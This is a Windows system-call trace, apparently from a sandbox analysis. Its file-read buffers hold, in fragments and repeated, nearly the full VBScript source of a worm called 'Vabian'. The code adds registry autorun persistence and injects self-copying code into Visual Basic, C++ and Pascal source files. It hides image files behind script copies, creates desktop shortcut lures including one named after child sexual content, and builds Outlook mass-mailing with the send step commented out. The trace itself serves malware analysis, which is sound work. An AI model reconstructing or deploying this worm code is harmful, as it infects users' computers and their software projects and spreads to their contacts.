Buffer => \Windows\CurrentVersion\Run\Vabian", "wscript.exe " & backpath & " %"
fso.copyfile wscript.scriptfullname, backpath
ranpay = i FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => nt(rnd * 9)+1
if ranpay > 5 then
set payload = fso.CreateTextFile("C:\payload.txt")
payload.write "VBS.Vabian" & vbcrlf & FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => "-------------" & vbcrlf
payload.write "Dear user ... " & vbcrlf & "I just want to tell you something" & vbcrlf
payload.wri FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => te "Your computer has been infected with virus,it called VBS.Vabian" & vbcrlf
payload.write "If you are an Programer, go look FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => at your project check all your frm or cpp or pas files" & vbcrlf
payload.write "Cos that is the victim" & vbcrlf & "Ok I have FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => to go now" & vbcrlf
payload.write "--------------------------------------------------" & vbcrlf
payload.write "Made by Psyc FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => hologic aka Puppy - Indonesian hip-hop singer"
payload.close
executor.run "C:\payload.txt"
end if
Set Drives=fso.drives FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer =>
For Each Drive in Drives
If drive.isready then
FindVictim drive
end If
Next
function FindVictim(path)
on error FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => resume next
Set Folder=fso.getfolder(path)
Set Files = folder.files
For Each File in files
If fso.GetExtensionName(file FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => .path)="frm" then
on error resume next
set readfrmmarker = fso.OpenTextFile(file.path,1, True)
frmmarker = readfrmmarker.r FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => eadline
frmreadall = readfrmmarker.readall
if frmmarker <> "Rem W32.hllp.Vabian" then
set readfrmmarker = fso.CreateTex FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => tFile(file.path, True)
readfrmmarker.write "Rem W32.hllp.Vabian" & vbcrlf & frmreadall & vbcrlf
readfrmmarker.write "Pri FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => vate Sub form_unload(cancel As Integer)" & vbcrlf
readfrmmarker.write "On Error GoTo err:" & vbcrlf
readfrmmarker.write FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => "Open " & chr(34) & "C:\vabian.vbs" & chr(34) & " for output as #1" & vbcrlf
readfrmmarker.write allsourcefrm & vbcrlf & "c FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => lose #1" & vbcrlf & "shell " & chr(34) & "C:\vabian.vbs" & chr(34) & vbcrlf
readfrmmarker.write "msgbox " & chr(34) & "Your FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => Program has been infected by Vabian virus Created by Psychologic" & chr(34) & ",VbInformation," & chr(34) & "W32.VBS.Vabian" & c FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => hr(34)
readfrmmarker.write vbcrlf & "exit sub" & vbcrlf & "err:" & vbcrlf & "End sub" & vbcrlf
readfrmmarker.close
en FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => d if
end if
If fso.GetExtensionName(file.path)="cpp" then
on error resume next
set readcppmarker = fso.OpenTextFile( FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => file.path,1, True)
cppmarker = readcppmarker.readline
cppreadall = readcppmarker.readall
if mid(cppreadall,len(cppreadall FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => ),1) = "}" then
cppreadall1 = replace(cppreadall,mid(cppreadall,len(cppreadall),1),"")
end if
if cppmarker <> "// W3 FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => 2.hllp.Vabian" then
set readcppmarker = fso.CreateTextFile(file.path, True)
readcppmarker.write "// W32.hllp.Vabian" & v FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => bcrlf & "FILE *Vabian;" & vbcrlf
readcppmarker.write cppreadall & "wormvabian = fopen("&chr(34)&"vabian.vbs"&chr(34)&","&chr FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => (34)&"wt"&chr(34)&");" & vbcrlf
readcppmarker.write "if(wormvabian)"&vbcrlf&"{"& allsourcecpp &vbcrlf&"}" & vbcrlf
readc FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => ppmarker.write "ShellExecute(NULL, "&chr(34)&"open"&chr(34)&", "&chr(34)&"vabian.vbs"&chr(34)&", NULL, NULL, SW_SHOWNORMAL);" & FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => vbcrlf
readcppmarker.write "}" & vbcrlf
readcppmarker.close
end if
end if
If fso.GetExtensionName(file.path)= FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => "pas" then
on error resume next
set readpasmarker = fso.OpenTextFile(file.path,1, True)
pasmarker = readpasmarker.readline FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer =>
pasreadall = readpasmarker.readall
if pasmarker <> "{ W32.hllp.Vabian }" then
set readpasmarker = fso.CreateTextFile(f FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => ile.path, True)
readpasmarker.write "{ W32.hllp.Vabian }" & vbcrlf & pasreadall & vbcrlf
readpasmarker.write "procedure FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => " & "TForm1.FormClose(Sender: TObject; var Action: TCloseAction);" & vbcrlf
readpasmarker.write "begin" & vbcrlf & "AssignFi FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => le (Vabian,'C:\Windows\STARTM~1\programs\startup\Vabian.vbs');" & vbcrlf
readpasmarker.write "Rewrite (Vabian);" & vbcrlf & FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => allsourcepas & vbcrlf & "CloseFile(Vabian);" & vbcrlf
readpasmarker.close
end if
end if
If fso.GetExtensionName(fil FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => e.path)="bmp" or fso.GetExtensionName(file.path)="jpg" or fso.GetExtensionName(file.path)="gif" or fso.GetExtensionName(file.pat FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,503 | 252 | NtReadFile |
Buffer => h)="ico" then
For i = 1 To 8
fvar = Chr(Int(22 * Rnd) + 97)
varall = fvar & varall
Next
on error resume next
FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00005000 BaseAddress => 0x001be000 |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => bathelp = file.path & ".bat"
Set dropper = Fso.Createtextfile(bathelp, True)
dropper.writeline "Attrib +h " & file.path
FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00002000 BaseAddress => 0x001cf000 |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer =>
dropper.Close
executor.run bathelp
fso.Deletefile bathelp
vbscopy = file.path & ".VX"
Set dropper2 = Fso.Createte FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => xtfile(vbscopy, True)
dropper2.write "Set " & varall & " = wscript.CreateObject(" & chr(34) & "WScript.Shell" & chr(34) & ")" FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => & vbcrlf & "Sucke.run " & chr(34) & file.path & chr(34) & vbcrlf
dropper2.write scr
dropper2.Close
end if
next
Se FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00003000 BaseAddress => 0x001d1000 |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => t Subfolders = folder.SubFolders
For Each Subfolder in Subfolders
FindVictim Subfolder.path
Next
end function
Set FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00006000 BaseAddress => 0x001de000 |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00006000 BaseAddress => 0x001be000 |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => spreader =CreateObject("Outlook.Application")
Set spreader =spreader.GetNameSpace("MAPI")
For Each C In spreader.AddressLists
FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00002000 BaseAddress => 0x001bb000 |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer =>
If C.AddressEntries.Count <> 0 Then
For D=1 To C.AddressEntries.Count
Set spreader=C.AddressEntries(D)
Set spreader=spreader FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00005000 BaseAddress => 0x001d2000 |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00007000 BaseAddress => 0x001d6000 |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => .CreateItem(0)
spreader.To=aaaaaaaa.Address
spreader.Subject="Vabian Milenium"
spreader.Body="Stop asking,just checkout the a FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00004000 BaseAddress => 0x001e4000 |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00004000 BaseAddress => 0x001be000 |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00003000 BaseAddress => 0x001de000 |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00005000 BaseAddress => 0x001c4000 |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => ttachment"
spreader.Attachments.Add(Fso.GetSpecialFolder(0)&"\Vabian.vbs")
spreader.DeleteAfterSubmit=True
'//If spreader.To FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00003000 BaseAddress => 0x001e8000 |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00004000 BaseAddress => 0x001ca000 |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => <> "" Then
'//spreader.Send
'//End If
Next
End If
Next
'VabianMarker FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00006000 BaseAddress => 0x001cf000 |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00005000 BaseAddress => 0x001d5000 |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00003000 BaseAddress => 0x001be000 |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00004000 BaseAddress => 0x001e1000 |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00005000 BaseAddress => 0x001c1000 |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00004000 BaseAddress => 0x001ca000 |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => FileHandle => 0x0000020c |
FAILURE | 0xc0000011 | |
| 19:40:26,513 | 252 | NtCreateFile |
ShareAccess => 3 FileName => C:\windows\backup_vabian.sys DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => Rem VBS.W32.I-worm.Vabian
Rem Script Project Infector [pas,frm,cpp]
Rem By Psychologic aka Puppy
Rem Mailto : Psychologic@hot FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => mail.com
'sending filename
'x=msgbox(Wscript.ScriptName, 0, "Title")
'malware expires....
date2 = #06/01/2018#
date1 = FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => Date 'get current date
'x = msgBox(date1,0,"sadd")
'x1 = msgBox(date2,0,"sad1")
'x2 = msgBox(diff,0,"diff")
Do while FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => true
If date1 < date2 Then
Exit Do
End If
WScript.Sleep 1000
Loop
On error resume next
Set executor = wscript.Cr FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => eateObject("WScript.Shell")
Set fso = CreateObject("scripting.FileSystemObject")
Set drop = Fso.opentextfile(wscript.scriptful FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => lname, 1)
src = drop.readall
drop.close
executor.regwrite "HKEY_CLASSES_ROOT\VXFile\"
executor.regwrite "HKEY_CLASSES_ROOT FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => \VXFile\DefaultIcon\","C:\PROGRA~1\INTERN~1\iexplore.exe,8"
executor.regwrite "HKEY_CLASSES_ROOT\VXFile\ScriptEngine\","VBScrip FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => t"
executor.regwrite "HKEY_CLASSES_ROOT\VXFile\ScriptHostEncode\","{85131631-480C-11D2-B1F9-00C04F86C324}"
executor.regwrite " FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => HKEY_CLASSES_ROOT\VXFile\Shell\Open\Command\","C:\WINDOWS\WScript.exe " & chr(34) & "%1" & chr(34) & " %*"
executor.regwrite "H FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => KEY_CLASSES_ROOT\VXFile\Shell\Play\Command\","C:\WINDOWS\COMMAND\CScript.exe " & chr(34) & "%1" & chr(34) & " %*"
executor.regw FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => rite "HKEY_CLASSES_ROOT\VXFile\ShellEx\PropertySheetHandlers\WSHProps\","{60254CA5-953B-11CF-8C96-00AA00B8708C}"
executor.regwr FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => ite "HKEY_CLASSES_ROOT\.VX\","VXFile"
executor.regwrite "HKEY_CLASSES_ROOT\VX\CLSID\","{B54F3741-5B07-11cf-A4B0-00AA004A55E8}"
FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer =>
executor.regwrite "HKEY_CLASSES_ROOT\VX\OLEScript\"
fso.copyfile wscript.scriptfullname,"C:\windows\backup_vabian.sys"
fso. FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => copyfile wscript.scriptfullname,"C:\windows\Vabian.VX"
if fso.FolderExists("C:\Documents and Settings\All Users\Desktop") the FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => n
on error resume next
set shell=wscript.createobject("wscript.shell")
set msc=shell.CreateShortCut("C:\Documents and Sett FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => ings\All Users\Desktop\Sex-Vabian.jpg.lnk")
msc.TargetPath = Shell.ExpandEnvironmentStrings("%windir%\Vabian.VX")
msc.IconLo FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => cation = Shell.ExpandEnvironmentStrings("C:\windows\system32\mspaint.exe, 0")
msc.WindowStyle = 4
msc.Save
end if
if fso FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => .FolderExists("C:\windows\Desktop") then
on error resume next
set shell=wscript.createobject("wscript.shell")
set msc=shel FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => l.CreateShortCut("C:\windows\Desktop\Sex-Children.jpg.lnk")
msc.TargetPath = Shell.ExpandEnvironmentStrings("%windir%\Vabian.V FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => X")
msc.WindowStyle = 4
msc.Save
end if
set opendroperfrm = fso.OpenTextFile("C:\windows\backup_vabian.sys", 1)
allsour FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => cefrm = ""
oneline = ""
do while opendroperfrm.readline <> "'VabianMarker"
oneline = opendroperfrm.readline
frmformat = FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => replace(oneline,chr(34),chr(34)&"&chr(34)&"&chr(34))
fullline = "? #1," & frmformat
allsourcefrm = allsourcefrm & vbcrlf & FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => fullline
loop
opendroperfrm.close
set opendropercpp = fso.OpenTextFile("C:\windows\backup_vabian.sys", 1)
allsourcecpp = FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => ""
oneline1 = ""
do while opendropercpp.readline <> "'VabianMarker"
oneline1 = ""
oneline1 = opendropercpp.readline
oneb FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => yone = len(oneline1)
for i = 1 to onebyone
read34 = mid(oneline1,i,1)
if read34 = chr(34) then
m = ",34"
else
FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => m = ""
end if
all = all & m
next
cppformat1 = replace(oneline1,chr(34),"%c")
cppformat = replace(cppformat1,"\","\\" FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => )
fullline1 = "fprintf(mvbswe," & chr(34) & cppformat & "\n" & chr(34) & all & ");"
allsourcecpp = allsourcecpp & vbcrlf & FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => fullline1
all = ""
loop
opendropercpp.close
set opendroperpas = fso.OpenTextFile("C:\windows\backup_vabian.sys", 1)
all FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => sourcepas = ""
oneline2 = ""
do while opendroperpas.readline <> "'VabianMarker"
oneline2 = ""
oneline2 = opendroperpas.rea FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => dline
fullline2 = "writeln (mvbswe,'" & oneline2 & "');"
allsourcepas = allsourcepas & vbcrlf & fullline2
loop
opendroper FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => pas.close
winfold = fso.getspecialfolder(0)
backpath = winfold & "\vabian.vbs"
executor.regwrite "HKLM\SOFTWARE\Microsoft FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => \Windows\CurrentVersion\Run\Vabian", "wscript.exe " & backpath & " %"
fso.copyfile wscript.scriptfullname, backpath
ranpay = i FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => nt(rnd * 9)+1
if ranpay > 5 then
set payload = fso.CreateTextFile("C:\payload.txt")
payload.write "VBS.Vabian" & vbcrlf & FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => "-------------" & vbcrlf
payload.write "Dear user ... " & vbcrlf & "I just want to tell you something" & vbcrlf
payload.wri FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => te "Your computer has been infected with virus,it called VBS.Vabian" & vbcrlf
payload.write "If you are an Programer, go look FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => at your project check all your frm or cpp or pas files" & vbcrlf
payload.write "Cos that is the victim" & vbcrlf & "Ok I have FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => to go now" & vbcrlf
payload.write "--------------------------------------------------" & vbcrlf
payload.write "Made by Psyc FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => hologic aka Puppy - Indonesian hip-hop singer"
payload.close
executor.run "C:\payload.txt"
end if
Set Drives=fso.drives FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer =>
For Each Drive in Drives
If drive.isready then
FindVictim drive
end If
Next
function FindVictim(path)
on error FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => resume next
Set Folder=fso.getfolder(path)
Set Files = folder.files
For Each File in files
If fso.GetExtensionName(file FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => .path)="frm" then
on error resume next
set readfrmmarker = fso.OpenTextFile(file.path,1, True)
frmmarker = readfrmmarker.r FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => eadline
frmreadall = readfrmmarker.readall
if frmmarker <> "Rem W32.hllp.Vabian" then
set readfrmmarker = fso.CreateTex FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => tFile(file.path, True)
readfrmmarker.write "Rem W32.hllp.Vabian" & vbcrlf & frmreadall & vbcrlf
readfrmmarker.write "Pri FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => vate Sub form_unload(cancel As Integer)" & vbcrlf
readfrmmarker.write "On Error GoTo err:" & vbcrlf
readfrmmarker.write FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => "Open " & chr(34) & "C:\vabian.vbs" & chr(34) & " for output as #1" & vbcrlf
readfrmmarker.write allsourcefrm & vbcrlf & "c FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => lose #1" & vbcrlf & "shell " & chr(34) & "C:\vabian.vbs" & chr(34) & vbcrlf
readfrmmarker.write "msgbox " & chr(34) & "Your FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => Program has been infected by Vabian virus Created by Psychologic" & chr(34) & ",VbInformation," & chr(34) & "W32.VBS.Vabian" & c FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => hr(34)
readfrmmarker.write vbcrlf & "exit sub" & vbcrlf & "err:" & vbcrlf & "End sub" & vbcrlf
readfrmmarker.close
en FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => d if
end if
If fso.GetExtensionName(file.path)="cpp" then
on error resume next
set readcppmarker = fso.OpenTextFile( FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => file.path,1, True)
cppmarker = readcppmarker.readline
cppreadall = readcppmarker.readall
if mid(cppreadall,len(cppreadall FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => ),1) = "}" then
cppreadall1 = replace(cppreadall,mid(cppreadall,len(cppreadall),1),"")
end if
if cppmarker <> "// W3 FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => 2.hllp.Vabian" then
set readcppmarker = fso.CreateTextFile(file.path, True)
readcppmarker.write "// W32.hllp.Vabian" & v FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => bcrlf & "FILE *Vabian;" & vbcrlf
readcppmarker.write cppreadall & "wormvabian = fopen("&chr(34)&"vabian.vbs"&chr(34)&","&chr FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => (34)&"wt"&chr(34)&");" & vbcrlf
readcppmarker.write "if(wormvabian)"&vbcrlf&"{"& allsourcecpp &vbcrlf&"}" & vbcrlf
readc FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => ppmarker.write "ShellExecute(NULL, "&chr(34)&"open"&chr(34)&", "&chr(34)&"vabian.vbs"&chr(34)&", NULL, NULL, SW_SHOWNORMAL);" & FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => vbcrlf
readcppmarker.write "}" & vbcrlf
readcppmarker.close
end if
end if
If fso.GetExtensionName(file.path)= FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => "pas" then
on error resume next
set readpasmarker = fso.OpenTextFile(file.path,1, True)
pasmarker = readpasmarker.readline FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer =>
pasreadall = readpasmarker.readall
if pasmarker <> "{ W32.hllp.Vabian }" then
set readpasmarker = fso.CreateTextFile(f FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => ile.path, True)
readpasmarker.write "{ W32.hllp.Vabian }" & vbcrlf & pasreadall & vbcrlf
readpasmarker.write "procedure FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => " & "TForm1.FormClose(Sender: TObject; var Action: TCloseAction);" & vbcrlf
